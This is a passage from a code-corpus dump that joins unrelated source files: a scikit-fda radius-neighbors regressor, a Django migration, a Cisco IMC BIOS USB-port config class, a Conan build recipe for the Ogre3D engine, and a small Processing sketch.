nature of the problem.
metric : string or callable, (default
:func:`l2_distance <skfda.metrics.l2_distance>`)
the distance metric to use for the tree. The default metric is
the L2 distance. See the documentation of the metrics module
for a list of available metrics.
metric_params : dict, optional (default = None)
Additional keyword arguments for the metric function.
outlier_response : :class:`FData`, optional (default = None)
Default response in the functional response case for test samples
without neighbors.
n_jobs : int or None, optional (default=None)
The number of parallel jobs to run for neighbors search.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors.
multivariate_metric : boolean, optional (default = False)
Indicates if the metric used is a sklearn distance between vectors (see
:class:`sklearn.neighbors.DistanceMetric`) or a functional metric of
the module :mod:`skfda.misc.metrics`.
Examples
--------
Firstly, we will create a toy dataset with gaussian-like samples shifted.
>>> from skfda.ml.regression import RadiusNeighborsRegressor
>>> from skfda.datasets import make_multimodal_samples
>>> from skfda.datasets import make_multimodal_landmarks
>>> y = make_multimodal_landmarks(n_samples=30, std=.5, random_state=0)
>>> y_train = y.flatten()
>>> X_train = make_multimodal_samples(n_samples=30, std=.5, random_state=0)
>>> X_test = make_multimodal_samples(n_samples=5, std=.05, random_state=0)
We will fit a Radius-Nearest Neighbors regressor to regress a scalar
response.
>>> neigh = RadiusNeighborsRegressor(radius=0.2)
>>> neigh.fit(X_train, y_train)
RadiusNeighborsRegressor(...radius=0.2...)
We can predict the modes of new samples
>>> neigh.predict(X_test).round(2) # Predict test data
array([ 0.39, 0.07, 0.26, 0.5 , 0.46])
Now we will create a functional response to train the model
>>> y_train = 5 * X_train + 1
>>> y_train
FDataGrid(...)
We train the estimator with the functional response
>>> neigh.fit(X_train, y_train)
RadiusNeighborsRegressor(...radius=0.2...)
And predict the responses as in the first case.
>>> neigh.predict(X_test)
FDataGrid(...)
See also
--------
:class:`~skfda.ml.classification.KNeighborsClassifier`
:class:`~skfda.ml.classification.RadiusNeighborsClassifier`
:class:`~skfda.ml.classification.NearestCentroids`
:class:`~skfda.ml.regression.KNeighborsRegressor`
:class:`~skfda.ml.clustering.NearestNeighbors`
Notes
-----
See Nearest Neighbors in the sklearn online documentation for a discussion
of the choice of ``algorithm`` and ``leaf_size``.
This class wraps the sklearn regressor
`sklearn.neighbors.RadiusNeighborsRegressor`.
https://en.wikipedia.org/wiki/K-nearest_neighbor_algorithm
"""
def __init__(self, radius=1.0, weights='uniform', regressor='mean',
algorithm='auto', leaf_size=30, metric='l2',
metric_params=None, outlier_response=None, n_jobs=1,
multivariate_metric=False):
"""Initialize the classifier."""
super().__init__(radius=radius, weights=weights, algorithm=algorithm,
leaf_size=leaf_size, metric=metric,
metric_params=metric_params, n_jobs=n_jobs,
multivariate_metric=multivariate_metric)
self.regressor = regressor
self.outlier_response = outlier_response
def _init_multivariate_estimator(self, sklearn_metric):
"""Initialize the sklearn radius neighbors estimator.
Args:
sklearn_metric: (pyfunc or 'precomputed'): Metric compatible with
sklearn API or matrix (n_samples, n_samples) with precomputed
distances.
Returns:
Sklearn Radius Neighbors estimator initialized.
"""
return _RadiusNeighborsRegressor(
radius=self.radius, weights=self.weights,
algorithm=self.algorithm, leaf_size=self.leaf_size,
metric=sklearn_metric, metric_params=self.metric_params,
n_jobs=self.n_jobs)
def _query(self, X):
"""Return distances and neighbors of given sample.
Args:
X: the sample
Returns:
Distances and neighbors of a given sample
"""
return self.estimator_.radius_neighbors(X)
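# --- Editor's illustrative sketch (not part of the original module) ---
# Both regressors above accept a user-defined ``weights`` callable: it receives
# an array of neighbor distances and must return an array of the same shape.
# A minimal example of such a callable (numpy is assumed to be available, as it
# is a dependency of the surrounding package); it would be passed as
# ``KNeighborsRegressor(weights=inverse_squared_weights)``.
import numpy as np

def inverse_squared_weights(distances):
    """Give closer neighbors a larger weight; the epsilon avoids division by zero."""
    distances = np.asarray(distances, dtype=float)
    return 1.0 / (distances ** 2 + 1e-12)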
| 39.64723
| 79
| 0.671005
|
c4c56eeb34bdf86315e49480f6fd7580d11e247d
| 557
|
py
|
Python
|
operator_api/ledger/migrations/0003_auto_20171229_1455.py
|
liquidity-network/nocust-hub
|
76f49f9b8a6c264fcbe9e0c110e98031d463c0a8
|
[
"MIT"
] | 1
|
2021-08-04T06:09:46.000Z
|
2021-08-04T06:09:46.000Z
|
operator_api/ledger/migrations/0003_auto_20171229_1455.py
|
liquidity-network/nocust-hub
|
76f49f9b8a6c264fcbe9e0c110e98031d463c0a8
|
[
"MIT"
] | 8
|
2020-11-01T19:48:21.000Z
|
2022-02-10T14:12:25.000Z
|
operator_api/ledger/migrations/0003_auto_20171229_1455.py
|
liquidity-network/nocust-hub
|
76f49f9b8a6c264fcbe9e0c110e98031d463c0a8
|
[
"MIT"
] | 3
|
2020-11-01T15:59:56.000Z
|
2021-09-16T07:18:18.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2017-12-29 14:55
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ledger', '0002_pgsql_constraints'),
]
operations = [
migrations.AlterField(
model_name='wallet',
name='registration_round',
field=models.BigIntegerField(
validators=[django.core.validators.MinValueValidator(0)]),
),
]
| 24.217391
| 74
| 0.639138
|
f05d7fd0f9642e16df14234b0faf65e856bb37ef
| 8,988
|
py
|
Python
|
imcsdk/mometa/bios/BiosVfUSBPortsConfig.py
|
vadimkuznetsov/imcsdk
|
ed038ce1dbc8031f99d2dfb3ccee3bf0b48309d8
|
[
"Apache-2.0"
] | null | null | null |
imcsdk/mometa/bios/BiosVfUSBPortsConfig.py
|
vadimkuznetsov/imcsdk
|
ed038ce1dbc8031f99d2dfb3ccee3bf0b48309d8
|
[
"Apache-2.0"
] | null | null | null |
imcsdk/mometa/bios/BiosVfUSBPortsConfig.py
|
vadimkuznetsov/imcsdk
|
ed038ce1dbc8031f99d2dfb3ccee3bf0b48309d8
|
[
"Apache-2.0"
] | 1
|
2019-11-10T18:42:04.000Z
|
2019-11-10T18:42:04.000Z
|
"""This module contains the general information for BiosVfUSBPortsConfig ManagedObject."""
from ...imcmo import ManagedObject
from ...imccoremeta import MoPropertyMeta, MoMeta
from ...imcmeta import VersionMeta
class BiosVfUSBPortsConfigConsts:
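    # Allowed values for each vp* BIOS token defined below; the lower-case forms
    # are accepted aliases and "platform-default" falls back to the platform's
    # default setting.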
VP_ALL_USB_DEVICES_DISABLED = "Disabled"
VP_ALL_USB_DEVICES_ENABLED = "Enabled"
_VP_ALL_USB_DEVICES_DISABLED = "disabled"
_VP_ALL_USB_DEVICES_ENABLED = "enabled"
VP_ALL_USB_DEVICES_PLATFORM_DEFAULT = "platform-default"
VP_USB_PORT_FRONT_DISABLED = "Disabled"
VP_USB_PORT_FRONT_ENABLED = "Enabled"
_VP_USB_PORT_FRONT_DISABLED = "disabled"
_VP_USB_PORT_FRONT_ENABLED = "enabled"
VP_USB_PORT_FRONT_PLATFORM_DEFAULT = "platform-default"
VP_USB_PORT_INTERNAL_DISABLED = "Disabled"
VP_USB_PORT_INTERNAL_ENABLED = "Enabled"
_VP_USB_PORT_INTERNAL_DISABLED = "disabled"
_VP_USB_PORT_INTERNAL_ENABLED = "enabled"
VP_USB_PORT_INTERNAL_PLATFORM_DEFAULT = "platform-default"
VP_USB_PORT_KVM_DISABLED = "Disabled"
VP_USB_PORT_KVM_ENABLED = "Enabled"
_VP_USB_PORT_KVM_DISABLED = "disabled"
_VP_USB_PORT_KVM_ENABLED = "enabled"
VP_USB_PORT_KVM_PLATFORM_DEFAULT = "platform-default"
VP_USB_PORT_REAR_DISABLED = "Disabled"
VP_USB_PORT_REAR_ENABLED = "Enabled"
_VP_USB_PORT_REAR_DISABLED = "disabled"
_VP_USB_PORT_REAR_ENABLED = "enabled"
VP_USB_PORT_REAR_PLATFORM_DEFAULT = "platform-default"
VP_USB_PORT_SDCARD_DISABLED = "Disabled"
VP_USB_PORT_SDCARD_ENABLED = "Enabled"
_VP_USB_PORT_SDCARD_DISABLED = "disabled"
_VP_USB_PORT_SDCARD_ENABLED = "enabled"
VP_USB_PORT_SDCARD_PLATFORM_DEFAULT = "platform-default"
VP_USB_PORT_VMEDIA_DISABLED = "Disabled"
VP_USB_PORT_VMEDIA_ENABLED = "Enabled"
_VP_USB_PORT_VMEDIA_DISABLED = "disabled"
_VP_USB_PORT_VMEDIA_ENABLED = "enabled"
VP_USB_PORT_VMEDIA_PLATFORM_DEFAULT = "platform-default"
class BiosVfUSBPortsConfig(ManagedObject):
"""This is BiosVfUSBPortsConfig class."""
consts = BiosVfUSBPortsConfigConsts()
naming_props = set([])
mo_meta = {
"classic": MoMeta("BiosVfUSBPortsConfig", "biosVfUSBPortsConfig", "USB-Ports-Config", VersionMeta.Version151f, "InputOutput", 0x7ff, [], ["admin"], [u'biosPlatformDefaults', u'biosSettings'], [], ["Get", "Set"]),
"modular": MoMeta("BiosVfUSBPortsConfig", "biosVfUSBPortsConfig", "USB-Ports-Config", VersionMeta.Version2013e, "InputOutput", 0x7ff, [], ["admin"], [u'biosPlatformDefaults', u'biosSettings'], [], ["Get", "Set"])
}
prop_meta = {
"classic": {
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version151f, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version151f, MoPropertyMeta.READ_WRITE, 0x2, 0, 255, None, [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version151f, MoPropertyMeta.READ_WRITE, 0x4, 0, 255, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version151f, MoPropertyMeta.READ_WRITE, 0x8, None, None, None, ["", "created", "deleted", "modified", "removed"], []),
"vp_all_usb_devices": MoPropertyMeta("vp_all_usb_devices", "vpAllUsbDevices", "string", VersionMeta.Version151f, MoPropertyMeta.READ_WRITE, 0x10, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_front": MoPropertyMeta("vp_usb_port_front", "vpUsbPortFront", "string", VersionMeta.Version151f, MoPropertyMeta.READ_WRITE, 0x20, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_internal": MoPropertyMeta("vp_usb_port_internal", "vpUsbPortInternal", "string", VersionMeta.Version151f, MoPropertyMeta.READ_WRITE, 0x40, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_kvm": MoPropertyMeta("vp_usb_port_kvm", "vpUsbPortKVM", "string", VersionMeta.Version151f, MoPropertyMeta.READ_WRITE, 0x80, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_rear": MoPropertyMeta("vp_usb_port_rear", "vpUsbPortRear", "string", VersionMeta.Version151f, MoPropertyMeta.READ_WRITE, 0x100, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_sd_card": MoPropertyMeta("vp_usb_port_sd_card", "vpUsbPortSDCard", "string", VersionMeta.Version151f, MoPropertyMeta.READ_WRITE, 0x200, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_v_media": MoPropertyMeta("vp_usb_port_v_media", "vpUsbPortVMedia", "string", VersionMeta.Version151f, MoPropertyMeta.READ_WRITE, 0x400, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
},
"modular": {
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version2013e, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x2, 0, 255, None, [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x4, 0, 255, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x8, None, None, None, ["", "created", "deleted", "modified", "removed"], []),
"vp_all_usb_devices": MoPropertyMeta("vp_all_usb_devices", "vpAllUsbDevices", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x10, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_front": MoPropertyMeta("vp_usb_port_front", "vpUsbPortFront", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, 0x20, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_internal": MoPropertyMeta("vp_usb_port_internal", "vpUsbPortInternal", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x40, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_kvm": MoPropertyMeta("vp_usb_port_kvm", "vpUsbPortKVM", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x80, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_rear": MoPropertyMeta("vp_usb_port_rear", "vpUsbPortRear", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x100, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_sd_card": MoPropertyMeta("vp_usb_port_sd_card", "vpUsbPortSDCard", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, 0x200, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_v_media": MoPropertyMeta("vp_usb_port_v_media", "vpUsbPortVMedia", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x400, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
},
}
prop_map = {
"classic": {
"childAction": "child_action",
"dn": "dn",
"rn": "rn",
"status": "status",
"vpAllUsbDevices": "vp_all_usb_devices",
"vpUsbPortFront": "vp_usb_port_front",
"vpUsbPortInternal": "vp_usb_port_internal",
"vpUsbPortKVM": "vp_usb_port_kvm",
"vpUsbPortRear": "vp_usb_port_rear",
"vpUsbPortSDCard": "vp_usb_port_sd_card",
"vpUsbPortVMedia": "vp_usb_port_v_media",
},
"modular": {
"childAction": "child_action",
"dn": "dn",
"rn": "rn",
"status": "status",
"vpAllUsbDevices": "vp_all_usb_devices",
"vpUsbPortFront": "vp_usb_port_front",
"vpUsbPortInternal": "vp_usb_port_internal",
"vpUsbPortKVM": "vp_usb_port_kvm",
"vpUsbPortRear": "vp_usb_port_rear",
"vpUsbPortSDCard": "vp_usb_port_sd_card",
"vpUsbPortVMedia": "vp_usb_port_v_media",
},
}
def __init__(self, parent_mo_or_dn, **kwargs):
self._dirty_mask = 0
self.child_action = None
self.status = None
self.vp_all_usb_devices = None
self.vp_usb_port_front = None
self.vp_usb_port_internal = None
self.vp_usb_port_kvm = None
self.vp_usb_port_rear = None
self.vp_usb_port_sd_card = None
self.vp_usb_port_v_media = None
ManagedObject.__init__(self, "BiosVfUSBPortsConfig", parent_mo_or_dn, **kwargs)
| 66.088235
| 256
| 0.683689
|
e2c824c53b1ca2ad2a753d8ea2eb35283b797c73
| 15,524
|
py
|
Python
|
conanfile.py
|
HerAmu/conan-ogre3d
|
80e4cc40d55f66579c312dbe5042f794d8e3426d
|
[
"MIT"
] | null | null | null |
conanfile.py
|
HerAmu/conan-ogre3d
|
80e4cc40d55f66579c312dbe5042f794d8e3426d
|
[
"MIT"
] | null | null | null |
conanfile.py
|
HerAmu/conan-ogre3d
|
80e4cc40d55f66579c312dbe5042f794d8e3426d
|
[
"MIT"
] | null | null | null |
from conans import ConanFile, CMake, tools
from conans.model.version import Version
class Ogre3dConan(ConanFile):
name = "ogre3d"
version = "1.12.9"
license = "MIT"
author = "SINTEF Ocean"
url = "https://github.com/sintef-ocean/conan-ogre3d"
description = "3D graphics rendering engine"
topics = ("graphics", "3D rendering", "3D", "ogre3d")
settings = "os", "compiler", "build_type", "arch"
options = {
"with_cg": [True, False],
"with_boost": [True, False],
"with_poco": [True, False],
"samples": [True, False],
"with_python": [True, False],
"with_csharp": [True, False],
"with_java": [True, False],
"with_qt": [True, False],
"bites": [True, False],
"direct3d9_renderer": [True, False],
"direct3d11_renderer": [True, False],
"opengl_renderer": [True, False],
"opengl3_renderer": [True, False],
"opengles_renderer": [True, False],
"codec_freeimage": [True, False],
"codec_stbi": [True, False],
"plugin_bsp_scenemanager": [True,False],
"plugin_octree": [True,False],
"plugin_particlefx": [True,False],
"plugin_dotscene": [True,False],
"plugin_pcz_scenemanager": [True,False],
}
default_options = {
"with_cg": False,
"with_boost": False,
"with_poco": False,
"samples": False,
"with_python": False,
"with_csharp": False,
"with_java": False,
"with_qt": False,
"bites": False,
"direct3d9_renderer": False,
"direct3d11_renderer": False,
"opengl_renderer": False,
"opengl3_renderer": False,
"opengles_renderer": False,
"codec_freeimage": True,
"codec_stbi": True,
"plugin_bsp_scenemanager": True,
"plugin_octree": True,
"plugin_particlefx": True,
"plugin_dotscene": True,
"plugin_pcz_scenemanager": True,
}
generators = "cmake"
requires = [
("bzip2/1.0.8"),
("libpng/1.6.37"),
("freetype/2.10.2"),
("zlib/1.2.11"),
("pugixml/1.10"),
("sdl2/2.0.10@bincrafters/stable"),
("zziplib/0.13.71"),
# ("ois/1.5@utopia/testing"), # for older versions
]
folder_name = "ogre-{}".format(version)
# scm is a workaround for https://github.com/OGRECave/ogre/issues/1332
scm = {
"type": "git",
"subfolder": folder_name,
"url": "https://github.com/OGRECave/ogre.git",
"revision": "v{}".format(version),
"submodule": "recursive"
}
def configure(self):
# we only need sdl for IO control
self.options["sdl2"].fPIC = False
self.options["sdl2"].iconv = False
self.options["sdl2"].sdl2main = False
if self.settings.os == "Linux":
self.options["sdl2"].alsa = False
self.options["sdl2"].jack = False
self.options["sdl2"].pulse = False
self.options["sdl2"].nas = False
self.options["sdl2"].xcursor = False
self.options["sdl2"].xinerama = False
self.options["sdl2"].xinput = False
self.options["sdl2"].xrandr = False
self.options["sdl2"].xscrnsaver = False
self.options["sdl2"].xshape = False
self.options["sdl2"].xvm = False
if self.settings.os != "Windows":
del self.options.direct3d9_renderer
del self.options.direct3d11_renderer
def requirements(self):
if self.options.with_boost:
self.requires("boost/1.71.0@conan/stable")
if self.options.with_poco:
self.requires("poco/1.9.4")
if self.options.with_qt:
if self.settings.compiler != 'Visual Studio':
self.options["sdl2"].fPIC = True
self.requires("qt/5.15.2")
self.requires("libjpeg/9d")
if self.options.bites and self.settings.compiler != 'Visual Studio':
self.options["sdl2"].fPIC = True
if self.options.with_cg:
self.requires("nvidia-cg-toolkit-binaries/3.1.0013@utopia/testing")
if self.settings.os == "Linux" and self.options.bites:
self.requires("libxaw/1.0.13@bincrafters/stable")
if self.options.codec_freeimage:
self.requires("libjpeg/9d")
self.requires("freeimage/3.18.0@utopia/testing")
#if self.options.opengles_renderer:
#self.requires("opengl/system")
#if self.settings.os == "Linux":
# self.requires("egl/system")
def source(self):
tools.replace_in_file("{}/CMakeLists.txt".format(self.folder_name),
"project(OGRE VERSION {})".format(self.version),
'''project(OGRE VERSION {})
include(${{CMAKE_BINARY_DIR}}/conanbuildinfo.cmake)
conan_basic_setup()
link_libraries(${{CONAN_LIBS}})
add_compile_definitions(GLEW_NO_GLU)
add_compile_definitions(QT_NO_VERSION_TAGGING)'''.format(self.version))
def configure_cmake(self):
cmake = CMake(self)
cmake.definitions["OGRE_BUILD_DEPENDENCIES"] = "NO" # use conan libs
cmake.definitions["OGRE_COPY_DEPENDENCIES"] = "OFF"
cmake.definitions["OGRE_INSTALL_DEPENDENCIES"] = "OFF"
cmake.definitions["OGRE_INSTALL_PDB"] = "ON"
cmake.definitions["OGRE_BUILD_PLUGIN_CG"] = \
"ON" if self.options.with_cg else "OFF"
cmake.definitions["OGRE_BUILD_SAMPLES"] = \
"ON" if self.options.samples else "OFF"
cmake.definitions["OGRE_BUILD_COMPONENT_PYTHON"] = \
"ON" if self.options.with_python else "OFF"
cmake.definitions["OGRE_BUILD_COMPONENT_CSHARP"] = \
"ON" if self.options.with_csharp else "OFF"
cmake.definitions["OGRE_BUILD_COMPONENT_JAVA"] = \
"ON" if self.options.with_java else "OFF"
cmake.definitions["OGRE_BUILD_COMPONENT_BITES"] = \
"ON" if self.options.bites else "OFF"
if self.settings.os == "Windows":
cmake.definitions["OGRE_BUILD_RENDERSYSTEM_D3D9"] = \
"ON" if self.options.direct3d9_renderer else "OFF"
cmake.definitions["OGRE_BUILD_RENDERSYSTEM_D3D11"] = \
"ON" if self.options.direct3d11_renderer else "OFF"
cmake.definitions["OGRE_BUILD_RENDERSYSTEM_GL3PLUS"] = \
"ON" if self.options.opengl3_renderer else "OFF"
cmake.definitions["OGRE_BUILD_RENDERSYSTEM_GL"] = \
"ON" if self.options.opengl_renderer else "OFF"
cmake.definitions["OGRE_BUILD_RENDERSYSTEM_GLES2"] = \
"ON" if self.options.opengles_renderer else "OFF"
if self.settings.compiler == "clang":
cmake.definitions["CMAKE_EXE_LINKER_FLAGS"] = "-fopenmp=libomp"
cmake.definitions["Build_FreeImage_codec."] = \
"ON" if self.options.codec_freeimage else "OFF"
cmake.definitions["Enable_STBI_image_codec."] = \
"ON" if self.options.codec_stbi else "OFF"
cmake.definitions["Build_BSP_SceneManager_plugin"] = \
"ON" if self.options.plugin_bsp_scenemanager else "OFF"
cmake.definitions["Build_Octree_SceneManager_plugin"] = \
"ON" if self.options.plugin_octree else "OFF"
cmake.definitions["Build_ParticleFX_plugin"] = \
"ON" if self.options.plugin_particlefx else "OFF"
cmake.definitions["Build_.scene_plugin"] = \
"ON" if self.options.plugin_dotscene else "OFF"
cmake.definitions["Build_PCZ_SceneManager_plugin"] = \
"ON" if self.options.plugin_pcz_scenemanager else "OFF"
cmake.configure(source_folder=self.folder_name)
return cmake
def build(self):
cmake = self.configure_cmake()
cmake.build()
def package(self):
cmake = self.configure_cmake()
cmake.install()
self.copy("LICENSE*", dst="licenses",
ignore_case=True, keep_path=True)
# On UNIX, the 'lib' prefix needs to be added back to the plugin libraries, since it is intentionally removed by Ogre's build system
if self.settings.os != "Windows":
if self.options.codec_freeimage:
tools.rename("{}/lib/OGRE/Codec_FreeImage.so".format(self.package_folder), \
"{}/lib/OGRE/libCodec_FreeImage.so".format(self.package_folder))
if self.options.codec_stbi:
tools.rename("{}/lib/OGRE/Codec_STBI.so".format(self.package_folder), \
"{}/lib/OGRE/libCodec_STBI.so".format(self.package_folder))
if self.options.plugin_bsp_scenemanager:
tools.rename("{}/lib/OGRE/Plugin_BSPSceneManager.so".format(self.package_folder), \
"{}/lib/OGRE/libPlugin_BSPSceneManager.so".format(self.package_folder))
if self.options.plugin_octree:
tools.rename("{}/lib/OGRE/Plugin_OctreeSceneManager.so".format(self.package_folder), \
"{}/lib/OGRE/libPlugin_OctreeSceneManager.so".format(self.package_folder))
if self.options.plugin_particlefx:
tools.rename("{}/lib/OGRE/Plugin_ParticleFX.so".format(self.package_folder), \
"{}/lib/OGRE/libPlugin_ParticleFX.so".format(self.package_folder))
if self.options.plugin_dotscene:
tools.rename("{}/lib/OGRE/Plugin_DotScene.so".format(self.package_folder), \
"{}/lib/OGRE/libPlugin_DotScene.so".format(self.package_folder))
if self.options.with_cg:
tools.rename("{}/lib/OGRE/Plugin_CgProgramManager.so".format(self.package_folder), \
"{}/lib/OGRE/libPlugin_CgProgramManager.so".format(self.package_folder))
if self.options.plugin_pcz_scenemanager:
tools.rename("{}/lib/OGRE/Plugin_PCZSceneManager.so".format(self.package_folder), \
"{}/lib/OGRE/libPlugin_PCZSceneManager.so".format(self.package_folder))
tools.rename("{}/lib/OGRE/Plugin_OctreeZone.so".format(self.package_folder), \
"{}/lib/OGRE/libPlugin_OctreeZone.so".format(self.package_folder))
if self.options.opengl_renderer:
tools.rename("{}/lib/OGRE/RenderSystem_GL.so".format(self.package_folder), \
"{}/lib/OGRE/libRenderSystem_GL.so".format(self.package_folder))
if self.options.opengl3_renderer:
tools.rename("{}/lib/OGRE/RenderSystem_GL3Plus.so".format(self.package_folder), \
"{}/lib/OGRE/libRenderSystem_GL3Plus.so".format(self.package_folder))
if self.options.opengles_renderer:
tools.rename("{}/lib/OGRE/RenderSystem_GLES2.so".format(self.package_folder), \
"{}/lib/OGRE/libRenderSystem_GLES2.so".format(self.package_folder))
def package_info(self):
self.cpp_info.name = 'Ogre3D'
self.cpp_info.libdirs = ['lib', 'lib/OGRE']
libs = [
"OgreMain",
"OgreOverlay",
"OgrePaging",
"OgreProperty",
"OgreRTShaderSystem",
"OgreTerrain",
"OgreVolume",
"OgreMeshLodGenerator",
]
if self.options.codec_freeimage:
libs.append("Codec_FreeImage")
if self.options.codec_stbi:
libs.append("Codec_STBI")
if self.options.plugin_bsp_scenemanager:
libs.append("Plugin_BSPSceneManager")
if self.options.plugin_octree:
libs.append("Plugin_OctreeSceneManager")
if self.options.plugin_particlefx:
libs.append("Plugin_ParticleFX")
if self.options.plugin_dotscene:
libs.append("Plugin_DotScene")
if self.options.with_cg:
libs.append("Plugin_CgProgramManager")
if self.options.plugin_pcz_scenemanager:
libs.append("Plugin_PCZSceneManager")
libs.append("Plugin_OctreeZone")
if self.options.opengl_renderer:
libs.append("RenderSystem_GL")
if self.options.opengl3_renderer:
libs.append("RenderSystem_GL3Plus")
if self.settings.os == "Windows":
if self.options.direct3d9_renderer:
libs.append("RenderSystem_Direct3D9")
if self.options.direct3d11_renderer:
libs.append("RenderSystem_Direct3D11")
if self.options.opengles_renderer:
libs.append("RenderSystem_GLES2")
if self.options.opengl_renderer or self.options.opengl3_renderer or self.options.opengles_renderer:
libs.append("OgreGLSupport")
if self.options.bites:
libs.append("OgreBites")
if self.options.with_qt:
libs.append("OgreBitesQt")
self.cpp_info.includedirs.extend([
"include/OGRE",
"include/OGRE/Overlay",
"include/OGRE/Paging",
"include/OGRE/Property",
"include/OGRE/RTShaderSystem",
"include/OGRE/Terrain",
"include/OGRE/Volume",
"include/OGRE/Threading",
"include/OGRE/MeshLodGenerator",
])
if self.options.bites:
self.cpp_info.includedirs.append("include/OGRE/Bites")
if self.options.codec_freeimage:
self.cpp_info.includedirs.append("include/OGRE/Plugins/FreeImageCodec")
if self.options.codec_stbi:
self.cpp_info.includedirs.append("include/OGRE/Plugins/STBICodec")
if self.options.opengl_renderer:
self.cpp_info.includedirs.append("include/OGRE/RenderSystems/GL")
self.cpp_info.includedirs.append("include/OGRE/RenderSystems/GL/GL")
if self.options.opengl3_renderer:
self.cpp_info.includedirs.append("include/OGRE/RenderSystems/GL3Plus")
if self.settings.os == "Windows":
if self.options.direct3d9_renderer:
self.cpp_info.includedirs.append("include/OGRE/RenderSystems/Direct3D9")
if self.options.direct3d11_renderer:
self.cpp_info.includedirs.append("include/OGRE/RenderSystems/Direct3D11")
if self.options.opengles_renderer:
self.cpp_info.includedirs.append("include/OGRE/RenderSystems/GLES2")
if self.options.plugin_bsp_scenemanager:
self.cpp_info.includedirs.append("include/OGRE/Plugins/BSPSceneManager")
if self.options.plugin_octree:
self.cpp_info.includedirs.append("include/OGRE/Plugins/OctreeSceneManager")
if self.options.plugin_particlefx:
self.cpp_info.includedirs.append("include/OGRE/Plugins/ParticleFX")
if self.options.plugin_dotscene:
self.cpp_info.includedirs.append("include/OGRE/Plugins/DotScene")
if self.options.with_cg:
self.cpp_info.includedirs.append("include/OGRE/Plugins/CgProgramManager")
if self.options.plugin_pcz_scenemanager:
self.cpp_info.includedirs.append("include/OGRE/Plugins/PCZSceneManager")
self.cpp_info.includedirs.append("include/OGRE/Plugins/OctreeZone")
if self.settings.compiler == "clang":
self.cpp_info.exelinkflags = ["-fopenmp=libomp"]
if self.settings.compiler == "Visual Studio" \
and self.settings.build_type == "Debug":
self.cpp_info.libs = [lib + "_d" for lib in libs]
else:
self.cpp_info.libs = libs
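# --- Editor's illustrative sketch (not part of the recipe) ---
# configure_cmake() above translates each boolean Conan option into an "ON"/"OFF"
# CMake definition. The mapping itself reduces to this small helper (names below
# are illustrative, not the recipe's API):
def _bool_options_to_cmake(flags):
    """Map {'OGRE_BUILD_SAMPLES': False, ...} to {'OGRE_BUILD_SAMPLES': 'OFF', ...}."""
    return {name: "ON" if enabled else "OFF" for name, enabled in flags.items()}

assert _bool_options_to_cmake({"OGRE_BUILD_SAMPLES": False}) == {"OGRE_BUILD_SAMPLES": "OFF"}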
| 42.76584
| 118
| 0.616014
|
fdaa17f290c5a640a9e84a511383781a4fdb7352
| 221
|
pyde
|
Python
|
Homework/Listings/li2/li2.pyde
|
GranDarKross/2019-fall-polytech-cs
|
01ea3dccf7da66a32b14ec0df28d97cefc1d2160
|
[
"MIT"
] | null | null | null |
Homework/Listings/li2/li2.pyde
|
GranDarKross/2019-fall-polytech-cs
|
01ea3dccf7da66a32b14ec0df28d97cefc1d2160
|
[
"MIT"
] | null | null | null |
Homework/Listings/li2/li2.pyde
|
GranDarKross/2019-fall-polytech-cs
|
01ea3dccf7da66a32b14ec0df28d97cefc1d2160
|
[
"MIT"
] | null | null | null |
def setup():
size(400,400)
smooth()
noLoop()
background(10)
strokeWeight(10)
stroke(150)
def draw():
fill(250)
rect(100,100,100,100)
fill(50)
rect(200,200,50,100)
| 15.785714
| 26
| 0.524887
|
5b0bcc25efcfe37c7ea916e2633f36f9dea4bbaa
| 16,284
|
py
|
Python
|
synthtool/gcp/common.py
|
dzou/synthtool
|
d730883a396d1b475df95ddd47fdb6ccc79a29db
|
[
"Apache-2.0"
] | null | null | null |
synthtool/gcp/common.py
|
dzou/synthtool
|
d730883a396d1b475df95ddd47fdb6ccc79a29db
|
[
"Apache-2.0"
] | null | null | null |
synthtool/gcp/common.py
|
dzou/synthtool
|
d730883a396d1b475df95ddd47fdb6ccc79a29db
|
[
